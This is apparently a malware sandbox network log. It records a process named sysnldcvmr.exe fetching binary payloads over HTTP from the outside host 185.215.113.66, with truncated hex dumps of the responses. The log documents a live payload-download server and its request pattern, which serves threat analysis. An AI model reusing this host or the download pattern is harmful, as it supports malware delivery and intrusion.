Dec 5, 2024 17:35:37.820346117 CET	1236	IN	Data Raw: 37 36 14 ef 30 ee f8 f2 f4 b1 32 98 51 9c 01 31 ae e5 14 0d d7 4f dc 08 c1 ff d0 f6 0c b9 ba 36 ce 8c 81 ed ae 51 2e 2d dd 11 21 52 a2 c6 ae 9a 19 04 42 88 fd f9 34 22 97 f2 66 93 e9 57 03 52 d5 56 9d b9 33 43 49 36 e9 35 df e2 f0 f5 c6 9b b5 78 Data Ascii: 7602Q1O6Q.-!RB4"fWRV3CI65x`3$Tg^:F=nlX,#~4?^./1OV&}S5x8>mw{iQr8!XUfG.p2"3PoG%X@3\|_M\|7
Dec 5, 2024 17:35:37.820437908 CET	1084	IN	Data Raw: a1 b8 9f 70 1c 5d fe b5 63 05 d9 e3 9e 0a 70 75 96 29 ca 74 3f 47 c4 81 7b cc 49 84 43 5b 22 a2 dc a7 19 ec 61 42 56 7b ff 00 f6 14 20 8a 2f 5f 3a 16 3c 31 d7 28 ed 54 0b 51 86 aa 86 cd e8 ed fc 6d e5 7a 49 6d ea 08 1b 64 3d 18 4a e1 ea 9d 7a d7 Data Ascii: p]cpu)t?G{IC["aBV{ /_:<1(TQmzImd=JzqaZ=$HFoDvXdel+byyGn]I&/cz$(t\mLy-fuwH(F(/RGT[`'N=;J-JI./x/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.11	50080	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:41.352830887 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:41.796610117 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:41 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
Dec 5, 2024 17:35:41.796643019 CET	1236	IN	Data Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96 Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ\|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
Dec 5, 2024 17:35:41.796653986 CET	448	IN	Data Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1 Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*\|+>a`<Z!%\| 4&[+usL^etpuu);Xb<>M\
Dec 5, 2024 17:35:41.796698093 CET	1236	IN	Data Raw: 92 9e 26 b6 ba 24 d3 e9 5f 78 f0 46 b3 fb ec 4c 7a fc a1 5d c7 8a ec a6 42 ab 44 84 03 f9 81 96 36 fd ed c9 4f b3 81 fd e7 81 ea ce 79 f9 f3 a1 ca f0 5b a2 b8 c3 90 5f dc ed 5c 34 78 50 13 39 f3 bb 90 90 b0 6f 27 d8 e3 d7 65 e4 8e 4a 16 09 e5 54 Data Ascii: &$_xFLz]BD6Oy[_\4xP9o'eJTwA!Zv MmvgOtWG/C>&2P=e:5eorUle"Kk,/ew\3;_,79:-jS`kKc\`x CCTOK=HC>7
Dec 5, 2024 17:35:41.796710014 CET	1236	IN	Data Raw: 89 64 03 c4 b2 ec b9 97 d5 83 e8 57 97 b5 96 6d 6c e1 10 45 ab 13 bf f2 29 06 4d f4 06 88 06 a2 74 39 19 fe c6 d5 fa 1d 8e f0 ac a5 47 e5 a1 f1 32 3f ef 3d 4c 92 e5 2a e9 b5 ff 7b 50 a1 ad ea b8 71 20 43 54 20 64 73 86 90 f8 e1 cf 48 c1 80 bc e3 Data Ascii: dWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`HvnoSu;B9MP39L!Y:U\|M- R1'1g?g
Dec 5, 2024 17:35:41.796724081 CET	1236	IN	Data Raw: aa fa 62 12 93 06 96 26 10 ad ee 3f 3a 32 0f 63 b0 c9 34 e0 c6 5d 26 60 69 44 af c5 91 85 d2 84 09 89 f2 6c 3d 84 bc 18 7a 15 34 45 a4 64 67 41 97 93 05 44 ff df 37 26 13 b8 c0 69 cd d0 4d e7 a8 07 3a c0 b4 91 f1 c8 d0 9a 5f ec 8d 18 a9 e0 47 12 Data Ascii: b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&q"Ka4tO>]=7PpVra;AyN<.O~`=]/
Dec 5, 2024 17:35:41.796736002 CET	1236	IN	Data Raw: 55 fa f6 a6 80 b6 6c 83 d2 ea 2f d6 f9 a2 96 d2 ee 32 1d 3a 03 4f 21 69 97 4b 76 be d4 fd 5e 94 dc b6 91 f9 89 7f 6c da 9f c8 b4 c1 a7 bb 31 3d 07 3e 88 72 f1 4a fa 21 3b fb e2 1e 9e 3d 7f 77 4a 6f 8a 09 14 20 4f f5 68 09 fe f2 df 7a 11 bb 4f 3d Data Ascii: Ul/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKdPSmy"Y9o3QBqYV#Vr8C7ClU8.* /;7(^
Dec 5, 2024 17:35:41.796967030 CET	1236	IN	Data Raw: e3 8d 21 bb 4e dc cd 1a 6c ff 09 f1 d9 48 e3 7c af 33 cf be 1b 12 df 57 72 de 12 b5 be b0 1f a7 be 3a f9 9e ce 06 d1 45 e2 08 a7 d4 27 85 c9 b9 72 d1 c2 ba 68 f3 74 f6 c7 76 f4 e9 47 ea d4 1f d2 e2 2e 77 47 36 12 b0 6e 3d 2d c0 7a 09 e7 50 4b 2c Data Ascii: !NlH\|3Wr:E'rhtvG.wG6n=-zPK,,jhMRD Yi=8S7=3R]TwZW9^hx``\vkU&lJuGoexF*-~Q;Y0oqb=gP/
Dec 5, 2024 17:35:41.796978951 CET	1236	IN	Data Raw: 6d f2 73 85 6a 12 77 5c 9c 23 69 0c 30 2b 83 58 15 a7 0a 78 8b d9 e7 3c ae 29 59 e8 ea 2f 27 38 7d e8 bb 4d 38 96 ba 51 f9 ba 97 69 65 26 64 09 72 dc ea 15 d0 f3 9f dc 20 ab d3 42 81 d3 e8 76 59 6e 48 e8 85 96 02 c2 32 90 15 58 76 d7 70 d4 04 7c Data Ascii: msjw\#i0+Xx<)Y/'8}M8Qie&dr BvYnH2Xvp\|hMDGRnV - mS&9TMhZN<^'l}I4n/(U*SQ0EGuKMMv^+ QYI_UyC8v#"=<dYz %.:
Dec 5, 2024 17:35:41.796992064 CET	425	IN	Data Raw: 2b 8a 4c 0c ab 7f f0 c9 c5 94 f0 f3 80 3c ef ed 6b d8 9f 62 a8 03 27 e0 17 47 67 28 76 ac c8 d7 10 f0 b9 a3 f7 71 ce 49 93 4a 84 9c b0 8f ce 95 f4 29 88 c3 fe cf 80 c4 bc 4c 70 ad 6a 6c 7c 6f be e7 dc 2b 1c 0f 02 6e 4a 1f 45 95 24 7e 38 17 1d ca Data Ascii: +L<kb'Gg(vqIJ)Lpjl\|o+nJE$~8)XrJ]\|a<YaZ#A\|\|fsmK?\|-s;Q\|fGfAJPzKPKkg~3}lScv?Rje%t\|WYFuy3cs{^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.11	50082	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:44.041318893 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:45.372827053 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:45 GMT Content-Type: application/octet-stream Content-Length: 55040 Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT Connection: keep-alive ETag: "674b357a-d700" Accept-Ranges: bytes Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED] Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" \|%LB\|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<\|TwX?Fq)3Pr\|\jFC4wa\|zk9eTG$IFxP!+(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+\|~z0g[:e2?zO_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQchAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
Dec 5, 2024 17:35:45.372853994 CET	1236	IN	Data Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5 Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI5YYn#XGqenlH=F<S["z{{"lEU7e.6Due0hPD _Bt;%H_bC@97U8,/&U5Ck]ocRO3hW\|
Dec 5, 2024 17:35:45.372868061 CET	448	IN	Data Raw: 21 40 2e 7a e6 15 b0 99 e8 de ee 46 43 de 03 52 a6 24 16 2a b3 5d d1 a1 7f a1 78 24 78 cf 01 39 d9 7c 1d f8 bc 81 03 92 ba 67 09 de e8 5d f4 fa 51 0c a3 36 e6 93 c9 a6 8d b5 2b 22 59 9a f8 e5 f7 e7 93 69 b0 54 20 09 4a 3a 9e ac 16 cc 15 f9 31 da Data Ascii: !@.zFCR$*]x$x9\|g]Q6+"YiT J:1kYK`coIIe=v)~::N({6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#\|;d!q?+y<pt
Dec 5, 2024 17:35:45.372883081 CET	1236	IN	Data Raw: ec ab f3 28 62 b1 ff d2 33 a3 bb 28 d4 9e 06 03 34 71 c3 2b 05 76 4c 64 5b 46 ef 31 a0 f3 92 9e b9 f1 ff cb 17 a0 52 11 c2 df 6d da da ea 8a 74 01 be 90 aa ff 57 e5 34 59 98 94 b6 2d 97 67 51 1d bc 47 e8 a7 a3 08 0b cd 05 aa 63 b9 20 a3 b2 9d d6 Data Ascii: (b3(4q+vLd[F1RmtW4Y-gQGc % RdRB`OB{&SJNvvO{0%i01\Ap;NyJ6"8b!{SHcC/A#jd9XU`D5,#]gqPKa0
Dec 5, 2024 17:35:45.372895956 CET	1236	IN	Data Raw: 22 65 10 8a 26 7e 2c ef 72 37 db d1 97 08 9b ff f9 0c 65 f9 b6 3e 11 b0 6c a6 3d e4 e4 55 f2 93 2d c8 ae 76 22 e6 48 b6 ff 8c 50 43 1a bf 7c ec e4 29 32 37 e9 7f 07 67 b6 d3 ed 4a 5f bc 04 14 8a 6e ea b9 01 ef 11 73 5a f2 e3 27 0e a1 f4 ed 3c b5 Data Ascii: "e&~,r7e>l=U-v"HPC\|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&,qEkax?lsWe'JR#uQQ2R2$Dm n/q
Dec 5, 2024 17:35:45.372991085 CET	1236	IN	Data Raw: 31 42 c0 08 0f e1 31 33 2a f5 92 0b 38 a0 18 e6 1a 3a da 58 04 8b fa fe 8e cd c5 00 35 50 c7 ab 79 be 61 52 62 3b ca d6 36 43 58 16 8f 8d cd 58 2d 85 10 02 d8 d6 ce c3 1b ad d5 f5 2b 19 e0 58 30 dc 7b 83 ad 8b c5 83 ed a5 72 fa cb e4 8b 37 8a 5e Data Ascii: 1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^y_Zi{M@V`IIuBWm#x`n)Ch2)^W
Dec 5, 2024 17:35:45.373006105 CET	1236	IN	Data Raw: d1 2f ec 3d 2b 2c 39 f8 44 7e 47 fd dd 4e 07 96 9e 52 d5 fc 34 ac 3a be ae f3 a8 6d d6 7b d1 eb cf bc 65 31 16 da b0 d7 33 c5 07 a4 8e e3 50 8b db 1d 4f da d7 74 e0 c7 7f 30 f8 fa 3a 96 3c 92 81 dc 45 cb b3 33 20 99 cf 2d af da 0b d9 9c ea 98 7a Data Ascii: /=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-dCZ`p7(uiHd=)d3@<6C(N$?`Go{V$7Z5eI+6}fBw4G0oAG#of
Dec 5, 2024 17:35:45.373019934 CET	1236	IN	Data Raw: 5c 26 7b 36 f8 5a 45 a5 9d d7 df 7d 5d d3 b6 e6 8c 11 59 83 02 aa 7f f7 ab 60 c6 dc 78 5d 86 34 9f 79 73 73 98 ff a0 ff 69 7e 03 ba fe 76 4c 1e a4 c4 3d 30 5b df 08 bb b6 20 2c 1b cd 12 23 1f f2 89 33 6f 70 00 6c 13 d7 19 f2 d8 9a e9 fc 47 63 5c Data Ascii: \&{6ZE}]Y`x]4yssi~vL=0[ ,#3oplGc\Z&Fvu\Nbk>Ly?dpbkVV* M:[+#P%rJ^Bmd\|ZQg:*F!ExyZyl6F(gO%Fn_\0R_J6G
Dec 5, 2024 17:35:45.373193979 CET	1236	IN	Data Raw: 0d 23 d9 fe 1e 77 dd a8 c8 52 8a 6c b4 d8 a0 17 35 40 e3 cf bb 03 14 da 58 ee a2 29 3e 03 8a 26 21 03 b9 4d 50 f6 a5 e5 38 5d 15 55 9a 37 76 51 47 01 44 af 6a aa fc 9b 6e 67 a0 2d 21 3b dd 56 7d f1 3c 75 54 69 e0 c2 7a a0 e8 96 72 a9 7d 2c 87 2e Data Ascii: #wRl5@X)>&!MP8]U7vQGDjng-!;V}<uTizr},.WG8L B4sK7iuV^\\}]=hTC^QR#/"$eh(niyMznXZS+c.+ux7=&RMPUK
Dec 5, 2024 17:35:45.373207092 CET	1236	IN	Data Raw: 8f 33 8d 8f b6 0d e7 37 63 02 e6 f4 c8 c9 55 fc 91 8f 31 b7 73 50 31 6b 2a 61 de a0 52 2e 26 85 47 3d 9e 9d 79 e0 a6 aa e9 d1 97 82 18 ba 84 10 d8 23 af e4 36 84 ef b1 aa 67 1e b1 e3 33 4e af 41 23 bc b8 c8 6b b3 fc db ae 38 bd bd f9 af b0 60 db Data Ascii: 37cU1sP1kaR.&G=y#6g3NA#k8`&Mb_@GjY]24mJ$Oya:8s%uoI@Q`2\|+l'K~OvU5s25"rcvh2UW!m%@xfle]rCCN,G{
Dec 5, 2024 17:35:45.497033119 CET	1236	IN	Data Raw: 40 71 7b 47 4f 10 f3 15 4a ec 55 93 79 9d 31 cc 02 b3 be f9 5a 3d 83 74 c2 3e 73 2e df b2 70 92 4b a3 1d 39 fd 92 38 f6 be c6 df 1c af 36 f5 c3 42 fc 33 b5 be d6 e9 52 54 9b f1 b7 2a 9c 48 a6 4b 49 f3 61 72 da d8 28 e6 01 68 58 eb 7b 85 37 60 37 Data Ascii: @q{GOJUy1Z=t>s.pK986B3RT*HKIar(hX{7`7.ch2$B,eCb4\|x:BnR`Vl6gYDllWeU0nBorR#B\J6[%nODmwti+Hixi@h7))X8`xY{K^

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.11	50084	185.215.113.66	80

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:47.536969900 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:48.870861053 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:48 GMT Content-Type: application/octet-stream Content-Length: 63232 Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT Connection: keep-alive ETag: "67497f08-f700" Accept-Ranges: bytes Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED] Data Ascii: 3-;)VX\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t\|wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
Dec 5, 2024 17:35:48.870889902 CET	124	IN	Data Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d Data Ascii: 1a@ #o;R`_\|#\|H%0SH9~`aa-1gH)2sLGnc <k[63
Dec 5, 2024 17:35:48.872015953 CET	1236	IN	Data Raw: d3 d3 c0 0b 8a 7f b8 97 4e 22 4f ca 14 06 f0 a4 fe ab cc ab ac 94 22 41 1c 65 72 b1 a1 b5 80 5e 31 c0 cd f5 46 7f 2e a6 44 0d c3 f3 5b 60 96 13 5c 9d b4 83 4f f6 f0 35 44 7d 2b ea 99 13 61 4c 2e 41 60 a3 15 7d 34 29 77 78 23 0f 30 4a ae 21 f3 ba Data Ascii: N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz\|dNz=5%xuA~P{m2[Nz"Nz/`nO!\|I7XL!z?K3GB&CPXL_6<$v!afZ96*.3
Dec 5, 2024 17:35:48.872097015 CET	1236	IN	Data Raw: 2c 88 74 8b b7 76 62 a3 c9 c5 27 d0 2a 27 5c 3d 75 89 75 b6 08 e3 64 b7 af 9f 42 79 11 1c 3a 2f e8 fa 1f 02 ca 7a 20 84 ab 43 6c 66 1d 11 79 ac b5 00 76 a0 c4 46 b4 fc 34 6f d3 2b 57 54 fd 5a a7 ba 6a 03 af 6d 51 1f 49 41 51 5f 04 c7 8a c5 5b a2 Data Ascii: ,tvb''\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]rG.sM=Is$aZt&ID. MzL2V7QIu;5f;kIB*w%zH-L=_k_/i
Dec 5, 2024 17:35:48.872328997 CET	248	IN	Data Raw: 7a fe 71 03 99 6d 41 8c fb 0c b8 8a 45 80 8e 7f ee d8 c3 f9 c4 c0 8c 7f b4 fd 48 e2 80 d4 a2 0b e7 83 a2 eb b5 e0 d3 1c 9b c2 5d 36 a2 1a fd fc b3 74 e2 3a 01 a3 46 ae f8 b7 c7 f6 76 71 10 6c 44 90 f8 85 c7 d1 11 19 b7 46 54 d6 b3 fe b3 a2 7c 9a Data Ascii: zqmAEH]6t:FvqlDFT\|JG9_,l{!G6eMqP_dUxqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3
Dec 5, 2024 17:35:48.874139071 CET	1236	IN	Data Raw: fc 04 b1 a3 61 a9 3e e9 b8 4f 99 39 08 9c 69 da 46 18 36 3a 4b 73 dc 66 d7 fd c6 fb 18 c4 f0 71 ec dd 69 3d 4e 7f d9 ab 61 42 45 69 3f 09 c2 f8 94 ed f4 9a d9 59 30 4f 65 5b 90 4f 6d 9a d5 80 e7 09 b9 42 31 f9 9c c9 1a 0a 46 5f a8 4d 51 63 eb a7 Data Ascii: a>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe
Dec 5, 2024 17:35:48.874206066 CET	1236	IN	Data Raw: c7 b6 4a 74 d2 29 ae 30 5a 13 0d c5 bd ad 85 62 e6 41 ba 2c db e4 33 17 af 92 97 e8 c2 50 6f d3 93 2b 1a d9 ef c8 8c ad 28 76 b1 0a 03 22 aa a4 9d d6 19 b7 f4 a3 21 68 33 93 55 49 99 92 85 49 83 f2 c1 f7 84 ba 94 17 67 0a b6 68 7c b3 3e 5f 83 de Data Ascii: Jt)0ZbA,3Po+(v"!h3UIIgh\|>_C+]`OG3de{tlnAj}xAD\|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P
Dec 5, 2024 17:35:48.874208927 CET	248	IN	Data Raw: 4d 81 90 a2 d9 c9 ea 87 af e7 54 a4 00 ee 8f 86 4d 10 1b 06 cf bd 41 22 9f f2 47 09 3b 4c 20 17 59 91 37 2b c7 68 ae 66 7e 0f 1e 64 ca 7d 4d 56 36 9b 98 57 4e 5b 31 b4 bc 26 40 53 81 3d 1a 94 77 ce 40 60 b6 2c f1 68 f6 fc 84 5d 67 33 81 46 d2 a2 Data Ascii: MTMA"G;L Y7+hf~d}MV6WN[1&@S=w@`,h]g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$Z
Dec 5, 2024 17:35:48.875376940 CET	1236	IN	Data Raw: 4e 19 dd 3f ca 7c 76 56 25 cf d8 3b bc 0b cb e3 6b 61 d1 e8 74 ba 7b 9f f2 d9 3c 68 04 7d 8e 0f 0c b1 61 58 b2 89 2e a3 d7 a5 a6 67 de 63 77 82 29 21 e5 dc b8 b5 12 44 63 2f 26 6e 80 a8 59 93 9f f3 cb a5 38 f6 7d 47 18 0a fd 1a 10 c3 fc da 46 76 Data Ascii: N?\|vV%;kat{<h}aX.gcw)!Dc/&nY8}GFvfnz)W'#vqDVkjGT$@o\|fRdgFUVt't99#7><[CwN^>nxLWU63tuI-KS<9~
Dec 5, 2024 17:35:48.875437975 CET	1236	IN	Data Raw: e5 38 c4 33 36 b0 03 f5 cd c9 c0 30 b1 37 44 42 dc 55 49 55 be c3 68 9c 69 c1 11 97 33 09 f5 76 ba 2b 0b 44 51 96 3f 74 91 be 35 c3 11 5f 83 8f cf 2a 84 ec eb a0 7d 4e 67 ca 43 62 ca 3b 51 15 6c 2a 2d 10 a2 fa b7 6f fe 5b 39 e1 7d f2 d3 40 47 ee Data Ascii: 83607DBUIUhi3v+DQ?t5_}NgCb;Ql-o[9}@Gg~@kk3;w=eZLp<0 X6Gj6b1T2<=dMp.t/>,7HD)a,Cs} %)CLXw,df$F>k
